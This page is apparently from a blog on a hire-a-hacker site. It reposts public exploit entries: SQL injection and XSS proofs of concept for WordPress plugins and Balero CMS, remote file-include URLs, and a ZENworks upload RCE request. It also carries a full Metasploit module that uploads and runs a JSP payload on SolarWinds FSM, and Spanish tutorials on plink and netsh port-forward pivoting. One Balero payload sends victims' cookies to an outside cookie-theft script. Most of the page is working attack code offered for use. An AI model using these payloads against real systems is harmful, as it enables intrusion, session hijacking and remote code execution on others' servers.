Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863536345

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
######################

# Exploit Title : WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/

# Software Link : https://mega.co.nz/#!DJAEBLBS!IBiukGo-pirelHmsRV80xZDHIvpqZKtTIqsD8YrMf7U

# Date : 2015-04-05

# Tested on : Linux / Mozilla Firefox
 
######################

# Description

 WordPress All In One WP Security & Firewall 3.9.0 suffers from Blind SQL Injection vulnerability
 
 There are some pages with wordpress esc_sql function. 
 esc_sql is prone to Blind SQL Injection (discovered by Ryan Dewhurst - http://dewhurstsecurity.com/)
 
 isset($_GET["orderby"]) ? $orderby = strip_tags($_GET["orderby"]): $orderby = '';
 isset($_GET["order"]) ? $order = strip_tags($_GET["order"]): $order = '';
 
 - admin/wp-security-list-404.php
 
 $orderby = !empty($orderby) ? esc_sql($orderby) : 'id';
 $order = !empty($order) ? esc_sql($order) : 'DESC';
 ...
 ...
 $data = $wpdb->get_results("SELECT * FROM $events_table_name ORDER BY $orderby $order", ARRAY_A);
 
 
 - admin/wp-security-list-login-fails.php
 
 $orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date';
 $order = !empty($order) ? esc_sql($order) : 'DESC';
 
 $data = $wpdb->get_results("SELECT * FROM $failed_logins_table_name ORDER BY $orderby $order", ARRAY_A);
 
 
 - admin/wp-security-list-acct-activity-php
 
 $orderby = !empty($orderby) ? esc_sql($orderby) : 'login_date';
 $order = !empty($order) ? esc_sql($order) : 'DESC';
 
 $data = $wpdb->get_results("SELECT * FROM $login_activity_table ORDER BY $orderby $order LIMIT 50", ARRAY_A)
 
 
 - admin/wp-security-list-locked-ip.php
 
 $orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date';
 $order = !empty($order) ? esc_sql($order) : 'DESC';
 
 $data = $wpdb->get_results("SELECT * FROM $lockdown_table_name WHERE release_date > now() ORDER BY $orderby $order", ARRAY_A)

######################

# PoC

 http://VICTIM//wp-admin/admin.php?page=aiowpsec&tab=tab3&orderby=user_id,(select * from (select(sleep(30)))a)&order=asc


######################

# Vulnerability Disclosure Timeline:

2015-04-05: Discovered vulnerability
2015-04-06: Vendor Notification
2015-04-06: Vendor Response/Feedback 
2015-04-07: Vendor Send Fix/Patch (3.9.1)
2015-04-07: Public Disclosure 

#######################

Discovered By : Claudio Viviani
                http://www.homelab.it
                http://ffhd.homelab.it (Free Fuzzy Hashes Database)
 
                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
HireHackking 
# Exploit Title: Shareaholic 7.6.0.3 XSS
# Date: 10-11-2014
# Software Link: https://wordpress.org/plugins/shareaholic/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9311
# Category: webapps

1. Description

ShareaholicAdmin::add_location is accessible for every registered user.

File: shareaholic\shareaholic.php

add_action('wp_ajax_shareaholic_add_location',  array('ShareaholicAdmin', 'add_location'));


$_POST['location'] is not escaped.

File: shareaholic\admin.php

public static function add_location() {
	$location = $_POST['location'];
	$app_name = $location['app_name'];
	ShareaholicUtilities::update_options(array(
	  'location_name_ids' => array(
	    $app_name => array(
	      $location['name'] => $location['id']
	    ),
	  ),
	  $app_name => array(
	    $location['name'] => 'on'
	  )
	));

	echo json_encode(array(
	  'status' => "successfully created a new {$location['app_name']} location",
	  'id' => $location['id']
	));

	die();
}

http://security.szurek.pl/shareaholic-7603-xss.html

2. Proof of Concept

Login as regular user (created using wp-login.php?action=register) then:

<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="shareaholic_add_location">
    <input type="hidden" name="location[app_name]" value="recommendations">
    <input type="hidden" name="location[name]" value="post_below_content">
    XSS: <input type="text" name="location[id]" value="'><script>alert(String.fromCharCode(88,83,83));</script>">
    <input type="submit" value="Hack!">
</form>

XSS will be visible for admin:

http://wordpress-install/wp-admin/admin.php?page=shareaholic-settings
  
3. Solution:
  
Update to version 7.6.1.0
https://downloads.wordpress.org/plugin/shareaholic.7.6.1.0.zip
https://blog.shareaholic.com/security-update-shareaholic-wordpress-plugin/
HireHackking 
<!--

Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities

Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2

Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.

Desc: Input passed to the 'content' POST parameter and the cookie 'counter'
is not properly sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in context of an affected site.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5239
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5239.php


04.03.2015

-->


<html>
  <body>
    <script>
      document.cookie="counter=1<script>confirm('XSS')</script>; path=/balerocms/";
    </script>
  </body>
</html>


csrf+stored xss+filter bypass+session hijack:

<html>
  <body>
    <form action="http://localhost/balerocms/admin/edit_delete_post/mod-blog" method="POST">
      <input type="hidden" name="title" value="ZSL" />
      <input type="hidden" name="content" value="pwned&lt;/textarea&gt;<s\cript>document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;</s\cript>" />
      <input type="hidden" name="files" value="joxy.poxy" />
      <input type="hidden" name="delete_post[]" value="135" />
      <input type="hidden" name="id" value="135" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
HireHackking 

Balero CMS v0.7.2 Multiple Blind SQL Injection Vulnerabilities

Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2

Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.

Desc: The application suffers from multiple blind SQL injection vulnerabilities
when input is passed to several POST parameters thru their affected modules
which are not properly sanitised before being returned to the user or used
in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

Vulnerable POST parameters in affected modules:
-----------------------------------------------
- pages         [admin]
- themes        [admin]
- code          [mod-languages]
- id            [mod-blog, mod-virtual_page]
- title         [mod-blog]
- a             [mod-virtual_page]
- virtual_title [mod-virtual_page]
-----------------------------------------------

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5238
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5238.php


04.03.2015

--


csrf+bsqli poc:

<html>
  <body>
    <form action="http://localhost/balerocms/admin/edit_page/mod-virtual_page/id-11" method="POST">
      <input type="hidden" name="virtual_title" value="ZSL" />
      <input type="hidden" name="a" value="1" />
      <input type="hidden" name="content" value="Testingus" />
      <input type="hidden" name="_wysihtml5_mode" value="1" />
      <input type="hidden" name="id" value="11' and benchmark (50000000,sha1(1))-- " />
      <input type="hidden" name="submit_delete" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
HireHackking 
# Exploit Title: Wordpress plugin 'Traffic Analyzer' Blind SQL Injection
# Google Dork: inurl:/plugins/trafficanalyzer/js/
# Date: 4/7/2015
# Exploit Author: Dan King (@fuzztester)
# Vendor Homepage: http://wptrafficanalyzer.in/
# Software Link: https://wordpress.org/plugins/trafficanalyzer/
# Version: 3.4.2
# Tested on: Ubuntu 14.10 with Mysql and Wordpress 4.11

[+] Issue [+]

The Wordpress plugin "Traffic Analyzer" is vulnerable to a blind SQL injection vulnerability. The application does not properly validate input from the "Referer" HTTP header value.

[+] Impact [+]

This vulnerability would allow a remote attacker to access the database with the privleges configured by Wordpress. This could also lead to the attack gaining remote access to the webservers filesystem and further compromise the system hosting the Wordpress installation.

[+] Details [+]

The following section of PHP code is where the vulnerability exists. The $sql variable is a concatenated string intended on being used to insert data into the database. The the variable $referer is not checked for malicious data.

From 'class-TrafficAnalyzer.php' line number 297:

######################################################################################
$sql = " insert into $wpdb->prefix"."tanalyzer_pre ( hid,ip, script_name, user_agent, request_uri,resource_type,browser,resource,http_referer,wpta_cookie ) values ".
                                        " ('".$hid."'," .
                                        " '".$_SERVER["REMOTE_ADDR"]."', ".
                                        "'".$_SERVER['SCRIPT_NAME']."', " .
                                        " '".$_SERVER["HTTP_USER_AGENT"]."', ".
                                        " '". $_SERVER['REQUEST_URI']. "', ".
                                        " '".$resource_type."', " .
                                        " '".$browser."', " .
                                        " '".$resource ."', " .
                                        " '".$referer . "', " .
                                        " '".$this->wpta_cookie . "'" .
                                        " )";
###########################################################################################


[+] Proof of Concept [+]

Sending the following HTTP request to a vulnerable site will cause the request to be delayed for 30 seconds.

GET /[wordpress path]/ HTTP/1.1
Host: x.x.x.x
Referer: BLAH'||(SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(30) )||'
HireHackking

Plink.exe es la versión para línea de comandos de PuTTY SSH Client. En los Windows más recientes, ya hay un cliente SSH incorporado por lo que no es muy útil plink, sin embargo, sí que lo es para los sistemas más antiguos los cuales no tienen este cliente SSH.

Podemos encontrar el binario de plink normalmente en la ruta:

/usr/share/windows-resources/binaries/plink.exe

Si no, se puede descargar desde la web oficial de putty.

Siendo plink.exe un cliente SSH, lo único que podemos hacer es un Remote Port Forwarding. En el post de SSH ya se comentó el peligro que tiene esto, básicamente de esta forma estás escribiendo las credenciales de tu equipo en una máquina que no es tuya, por lo que hay que tener cuidado (también se puede hacer uso de claves asimétricas).

El comando para usar plink.exe es el siguiente:

cmd.exe /c echo y | plink.exe -l <usuario> -pw <contraseña> <ip mia de atacante> -R <puerto que abrimos en mi maquina atacante>:<host de quien queremos tunelizar>:<puerto que queremos tunelizar>

Transferiríamos plink a la máquina Windows y ejecutaríamos el comando desde ahí.

La primera parte del comando: cmd.exe /c echo y, sirve para en las shells no interactivas (como es la mayoría de reverse shells en sistemas Windows), poder aceptar el mensaje de precaución que lanza plink por defecto.

Por lo demás, el resto del comando se entiende fácil si ya se ha tocado Remote Port Forwarding, si no, recomiendo visitar el post de Pivoting con SSH.

Además de esto, algunos parámetros útiles que podemos agregar en plink son los siguientes:

  • -g –> permite que otros clientes de la LAN puedan conectarse al puerto que se abre en la máquina atacante. Por defecto solo se puede en local.
  • -f –> plink se va al segundo plano una vez se ha establecido la sesión SSH de forma exitosa.
  • -N –> indicamos que no ejecute una shell, simplemente que se conecte (esto no significa que el proceso se mande al segundo plano), es decir, quedaría así:
image 25

Es bastante recomendable usar los parámetros -f y -N.

-i –> permite indicar una clave privada. Sin embargo, hay que hacer una conversión, ya que plink no va a entender el formato por defecto que nos deja ssh-keygen. Una vez tenemos generada la clave privada con ssh-keygen, seguimos los siguientes pasos:

Instalamos las tools de putty:

sudo apt install putty-tools

Una vez instaladas, hacemos uso de puttygen:

puttygen <clave privada> -o <nueva clave privada>.ppk

De esta forma, esta nueva clave privada que tenemos si la entenderá plink y podremos usarla.

Con todo esto explicado, vamos a hacer una prueba en el siguiente laboratorio:

  • 3 Equipos
    • Kali
      • IP: 192.168.10.10
    • Windows 7
      • IP: 192.168.10.40 y 192.168.20.40 –> 2 Interfaces de Red
    • Debian –> Servidor Web y SSH – Puerto 22 y 80 activados
      • IP: 192.168.20.20
pivoting con netsh laboratorio 2

OJO: de cara al Remote Port Forwarding, recomiendo hacer un cambio simple de contraseña en el passwd.

image 26

Para quien no conozca esto, básicamente puedes generar una contraseña en DES UNIX con openssl:

image 27

Si cogemos esta contraseña generada y la sustituimos en el passwd por la «x«, la contraseña del usuario será la que hemos puesto en openssl, en este caso «hola«, cuando se quiera volver a la contraseña anterior simplemente en el passwd se quita lo escrito y se vuelve a poner la «x«.

Con esto hecho, nos dirigimos al Windows y usamos plink como se indicaba en el comando escrito previamente:

cmd.exe /c echo y | plink.exe -l <usuario> -pw <contraseña> <ip mia de atacante> -R <puerto que abrimos en mi maquina atacante>:<host de quien queremos tunelizar>:<puerto que queremos tunelizar>

image 30

Si nos fijamos hay dos puntos importantes aquí:

  1. Podemos tunelizar tantos puertos como queramos, siempre usando el parámetro -R.
  2. Al tunelizar un puerto SSH, tenemos que indicarle otro puerto a utilizar/abrir en nuestra máquina que no sea el 22, ya que este ya se está empleando.

De esta forma, ya tenemos ambos puertos tunelizados, en este caso el 22 (el 2222 en nuestra máquina) y el 80:

image 29
image 31

Plink es una herramienta que poco a poco se irá quedando en desuso por la implementación por defecto del cliente SSH en los sistemas Windows. Sin embargo, en ciertas ocasiones donde estemos lidiando con algún que otro sistema antiguo, nos puede venir bastante bien.

HireHackking 
>> Remote code execution in Novell ZENworks Configuration Management 11.3.1
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 07/04/2015 / Last updated: 07/04/2015

>> Background on the affected product:
"Automate and accelerate your Windows 7 migration
Microsoft estimates that it can take more than 20 hours to migrate a
single machine to Windows 7. Novell ZENworks Configuration Management
is ready to dramatically accelerate and automate every aspect of your
Windows 7 migration efforts.

Boost user productivity
Use Novell ZENworks Configuration Management to make sure users always
have access to the resources they need regardless of where they work
or what devices they use.

Eliminate IT effort
Automatically enforce policies and dynamically manage resources with
identity-based management of users as well as devices.

Expand your freedom to choose
Manage the lifecycles of all your current and future assets, with full
support for Windows and Linux systems, Novell eDirectory, Active
Directory, and more.

Simplify deployment with virtual appliances
Slash deployment times with a convenient virtual appliance deployment option.

Enjoy a truly unified solution
Centralize the management of all your devices into a single, unified
and easy-to-use web-based ZENworks console—called ZENworks Control
Center."

This vulnerability is present in ZENworks Configuration Management
(ZCM) which is part of the ZENworks Suite.
A blast from the past? This is a similar vulnerability to ZDI-10-078 /
OSVDB-63412, but it abuses a different parameter of the same servlet.
However this time Novell:
- Did not bother issuing a security advisory to their customers.
- Did not credit me even though I did responsible disclosure.
- Refused to provide a CVE number for months.
- Did not update their ZENworks Suite Trial software with the fix (you
can download it now from their site, install and test the PoC /
Metasploit module).
- Does not list the fix in the ZCM 11.3.2 update information
(https://www.novell.com/support/kb/doc.php?id=7015776).


>> Technical details:
Vulnerability: Remote code execution via file upload and directory traversal
CVE-2015-0779
Constraints: none; no authentication or any other information needed
Affected versions: ZENworks Configuration Management 11.3.1 and below

POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/&filename=payload.war
<WAR file payload in the body>

The WAR file will be automatically deployed to the server (on certain
Windows and Linux installations the path can be "../webapps/"). A
Metasploit module that exploits this vulnerability has been released.


>> Fix:
Upgrade to version ZENworks Configuration Management 11.3.2.


[1]: https://github.com/pedrib/PoC/blob/master/generic/zenworks_zcm_rce.txt
[2]: https://github.com/rapid7/metasploit-framework/pull/5096
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability",
      'Description'    => %q{
        This module exploits multiple vulnerabilities found in Solarwinds Firewall Security Manager
        6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface
        due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set
        the 'username' attribute before authentication. The second problem is that the settings-new.jsp
        file will only check the 'username' attribute before authorizing the 'uploadFile' action,
        which can be exploited and allows the attacker to upload a fake xls host list file to the
        server, and results in arbitrary code execution under the context of SYSTEM.

        Depending on the installation, by default the Change Advisor web server is listening on port
        48080 for an express install. Otherwise, this service may appear on port 8080.

        Solarwinds has released a fix for this vulnerability as FSM-v6.6.5-HotFix1.zip. You may
        download it from the module's References section.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rgod',  # Original discovery
          'mr_me <steventhomasseeley[at]gmail.com>', # https://twitter.com/ae0n_
          'sinn3r' # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2015-2284'],
          ['OSVDB', '81634'],
          ['ZDI', '15-107'],
          ['URL', 'http://downloads.solarwinds.com/solarwinds/Release/HotFix/FSM-v6.6.5-HotFix1.zip']
        ],
      'DefaultOptions'  =>
        {
          'RPORT'    => 48080 # Could be 8080 too
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Solarwinds Firewall Security Manager 6.6.5', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 13 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Base FMS directory path', '/'])
      ], self.class)
  end


  # Returns a checkcode that indicates whether the target is FSM or not
  def check
    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'fsm', 'login.jsp'))

    if res && res.body =~ /SolarWinds FSM Change Advisor/i
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end


  # Exploit/run command
  def exploit
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::NotVulnerable, 'Target does not appear to be a Solarwinds Firewall Security Manager')
    end

    # Stage 1 of the attack
    # 'admin' is there by default and you can't delete it
    username = 'admin'
    print_status("Auth bypass: Putting session value: username=#{username}")
    sid = put_session_value(username)
    print_status("Your SID is: #{sid}")

    # Stage 2 of the attack
    exe = generate_payload_exe(code: payload.encoded)
    filename = "#{Rex::Text.rand_text_alpha(5)}.jsp"
    # Because when we get a shell, we will be at:
    # C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice
    # So we have to adjust this filename in order to delete the file
    register_files_for_cleanup("../plugins/com.lisletech.athena.http.servlets_1.2/jsp/#{filename}")
    malicious_file = get_jsp_payload(exe, filename)
    print_status("Uploading file: #{filename} (#{exe.length} bytes)")
    upload_exec(sid, filename, malicious_file)
  end


  private


  # Returns a write-stager
  # I grabbed this from Juan's sonicwall_gms_uploaded.rb module
  def jsp_drop_bin(bin_data, output_file)
    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|

    jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|

    jspraw << %Q|int numbytes = data.length();\n|

    jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
    jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
    jspraw << %Q|{\n|
    jspraw << %Q|  char char1 = (char) data.charAt(counter);\n|
    jspraw << %Q|  char char2 = (char) data.charAt(counter + 1);\n|
    jspraw << %Q|  int comb = Character.digit(char1, 16) & 0xff;\n|
    jspraw << %Q|  comb <<= 4;\n|
    jspraw << %Q|  comb += Character.digit(char2, 16) & 0xff;\n|
    jspraw << %Q|  bytes[counter/2] = (byte)comb;\n|
    jspraw << %Q|}\n|

    jspraw << %Q|outputstream.write(bytes);\n|
    jspraw << %Q|outputstream.close();\n|
    jspraw << %Q|%>\n|

    jspraw
  end

  # Returns JSP that executes stuff
  # This is also from Juan's sonicwall_gms_uploaded.rb module
  def jsp_execute_command(command)
    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|try {\n|
    jspraw << %Q|  Runtime.getRuntime().exec("chmod +x #{command}");\n|
    jspraw << %Q|} catch (IOException ioe) { }\n|
    jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
    jspraw << %Q|%>\n|

    jspraw
  end


  # Returns a JSP payload
  def get_jsp_payload(exe, output_file)
    jsp_drop_bin(exe, output_file) + jsp_execute_command(output_file)
  end


  # Creates an arbitrary username by abusing the server's unsafe use of session.putValue
  def put_session_value(value)
    res = send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'fsm', 'userlogin.jsp'),
      'method'   => 'GET',
      'vars_get' => { 'username' => value }
    )

    unless res
      fail_with(Failure::Unknown, 'The connection timed out while setting the session value.')
    end

    get_sid(res)
  end


  # Returns the session ID
  def get_sid(res)
    cookies = res.get_cookies
    sid = cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
    sid
  end


  # Uploads a malicious file and then execute it
  def upload_exec(sid, filename, malicious_file)
    res = upload_file(sid, filename, malicious_file)

    if !res
      fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file.')
    elsif res.body.include?('java.lang.NoClassDefFoundError')
      print_status('Payload being treated as XLS, indicates a successful upload.')
    else
      print_status('Unsure of a successful upload.')
    end

    print_status('Attempting to execute the payload.')
    exec_file(sid, filename)
  end


  # Uploads a malicious file
  # By default, the file will be saved at the following location:
  # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\reports\tickets\
  def upload_file(sid, filename, malicious_file)
    # Put our payload in:
    # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\jsp\
    filename = "../../jsp/#{filename}"

    mime_data = Rex::MIME::Message.new
    mime_data.add_part(malicious_file, 'application/vnd.ms-excel', nil, "name=\"file\"; filename=\"#{filename}\"")
    mime_data.add_part('uploadFile', nil, nil, 'name="action"')

    proto = ssl ? 'https' : 'http'
    ref = "#{proto}://#{rhost}:#{rport}#{normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp')}"

    send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp'),
      'method'   => 'POST',
      'vars_get' => { 'action' => 'uploadFile' },
      'ctype'    => "multipart/form-data; boundary=#{mime_data.bound}",
      'data'     => mime_data.to_s,
      'cookie'   => sid,
      'headers'  => { 'Referer' => ref }
    )
  end


  # Executes the malicious file and get code execution
  # We will be at this location:
  # C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice
  def exec_file(sid, filename)
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'fsm', filename)
    )
  end


  # Overrides the original print_status so we make sure we print the rhost and port
  def print_status(msg)
    super("#{rhost}:#{rport} - #{msg}")
  end

end
HireHackking 
source: https://www.securityfocus.com/bid/51952/info

PHP is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users.

PHP 5.3.8 is vulnerable; other versions may also be affected. 

<?php

// make a Pdo_Mysql statement before

$result = $stmt->fetch(PDO::FETCH_LAZY);

session_start();

$_SESSION['PDORow'] = $result;
?>
HireHackking 
source: https://www.securityfocus.com/bid/51979/info
   
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
   
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
   
BASE 1.4.5 is vulnerable; other versions may be affected. 

Function: include_once    File: base_graph_form.php            Line: 1
Exploit: http://www.example.com/base/base_graph_form.php?BASE_path=[EV!L]
HireHackking 
source: https://www.securityfocus.com/bid/51974/info

Zimbra is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/zimbra/h/calendar?view=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
HireHackking 
source: https://www.securityfocus.com/bid/51976/info
 
Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
 
Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
 
http://www.example.com/novacms/optimizer/index.php?fileType=[EV!L]
HireHackking 
source: https://www.securityfocus.com/bid/51976/info
  
Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
  
Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
  
http://www.example.com/novacms/includes/function/gets.php?filename=[EV!L]
HireHackking 
source: https://www.securityfocus.com/bid/51976/info
   
Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
   
Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
   
http://www.example.com/novacms/includes/function/usertpl.php?conf[blockfile]=[EV!L]
HireHackking 
source: https://www.securityfocus.com/bid/51979/info

BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.

An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

BASE 1.4.5 is vulnerable; other versions may be affected. 

Function: include    File: base_db_setup.php            Line: 1
Exploit: http://www.example.com/base/base_db_setup.php?BASE_path=[EV!L]
HireHackking 
source: https://www.securityfocus.com/bid/51979/info
 
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
 
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
 
BASE 1.4.5 is vulnerable; other versions may be affected. 

Function: include_once    File: base_graph_common.php            Line: 1
Exploit: http://www.example.com/base/base_graph_common.php?BASE_path=[EV!L]
HireHackking 
source: https://www.securityfocus.com/bid/51979/info
  
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
  
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
  
BASE 1.4.5 is vulnerable; other versions may be affected. 

Function: include    File: base_graph_display.php            Line: 2
Exploit: http://www.example.com/base/base_graph_display.php?BASE_path=[EV!L]
HireHackking 
source: https://www.securityfocus.com/bid/51979/info
     
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
     
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
     
BASE 1.4.5 is vulnerable; other versions may be affected. 

Function: include_once    File: base_local_rules.php            Line: 1
Exploit: http://www.example.com/base/base_local_rules.php?BASE_path=[EV!L]
HireHackking 
source: https://www.securityfocus.com/bid/51979/info
        
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
        
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
        
BASE 1.4.5 is vulnerable; other versions may be affected. 

Exploit: http://www.example.com/base/base_maintenance.php?BASE_path=[EV!L]
HireHackking 
source: https://www.securityfocus.com/bid/51979/info
         
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
         
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
         
BASE 1.4.5 is vulnerable; other versions may be affected. 

Exploit: http://www.example.com/base/base_payload.php?BASE_path=[EV!L]
HireHackking

Netsh es una utilidad de Windows que nos permite hacer Port Forwarding de una forma muy sencilla. Además, la ventaja es que viene por defecto instalado en Windows, aunque la desventaja es que son necesarios privilegios de administrador para poder usarla (al menos de cara al Port Forwarding y el control del firewall).

Índice:

  • Introducción
  • Port Forwarding con netsh
  • Control del Firewall con netsh

Introducción

Los 3 comandos que vamos a usar son los siguientes:

  1. netsh interface portproxy add v4tov4 listenport=<puerto a escuchar> listenaddress=<direccion a escuchar> connectport=<puerto a conectar> connectaddress=<direccion a conectar>
  2. netsh interface portproxy show all
  3. netsh interface portproxy reset

El laboratorio de este post es el siguiente:

  • 3 Equipos
    • Kali
      • IP: 192.168.10.10
    • Windows 7
      • IP: 192.168.10.40 y 192.168.20.40 –> 2 Interfaces de Red
    • Debian –> Servidor Web y SSH – Puerto 22 y 80 activados
      • IP: 192.168.20.20
pivoting con netsh laboratorio 2

Port Forwarding con netsh

Estando en la máquina Windows y teniendo privilegios de administrador, podemos comprobar la tabla de Port Forwarding de netsh con el siguiente comando:

netsh interface portproxy show all

image 8

No nos muestra nada, por lo que está vacía. Así que con el siguiente comando, vamos a hacer el Port Forwarding de los puertos que queramos:

netsh interface portproxy add v4tov4 listenport=<puerto a escuchar> listenaddress=<direccion a escuchar> connectport=<puerto a conectar> connectaddress=<direccion a conectar>

image 9

En el comando se configuran 4 parámetros, cada uno de ellos, sirve para lo siguiente:

  • listenport –> Especificamos el puerto en el que Windows escuchará y que servirá como tunneling para la dirección y puerto que conectemos.
